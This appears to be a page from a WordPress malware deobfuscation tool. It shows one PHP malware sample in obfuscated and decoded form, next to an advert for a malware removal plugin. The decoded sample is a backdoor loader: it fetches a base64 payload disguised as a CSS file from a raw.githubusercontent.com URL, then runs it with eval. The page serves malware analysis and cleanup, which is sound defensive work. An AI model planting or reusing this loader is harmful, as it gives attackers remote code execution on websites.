Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $a=base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Z1YnVmZWYvcHJvamVjdDEvcmVmcy9oZWFkcy9tYWluL2NyZWF0ZS5jc3M=");$b=file_get_contents($a);if(empty($b)){$c=curl_init();curl_setopt($c,CURLOPT_URL,$a);curl_setopt($c,CURLOPT_RETURNTRANSFER,1);$b=curl_exec($c);curl_close($c);}eval("?...



Obfuscated php code

<?php
$a=base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Z1YnVmZWYvcHJvamVjdDEvcmVmcy9oZWFkcy9tYWluL2NyZWF0ZS5jc3M=");$b=file_get_contents($a);if(empty($b)){$c=curl_init();curl_setopt($c,CURLOPT_URL,$a);curl_setopt($c,CURLOPT_RETURNTRANSFER,1);$b=curl_exec($c);curl_close($c);}eval("?>".base64_decode($b));?>

Decoded(de-Obfuscated) php code

<?php

$a = "https://raw.githubusercontent.com/fubufef/project1/refs/heads/main/create.css";
$b = file_get_contents($a);
if (empty($b)) {
    $c = curl_init();
    curl_setopt($c, CURLOPT_URL, $a);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    $b = curl_exec($c);
    curl_close($c);
}
eval("?>" . base64_decode($b));

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.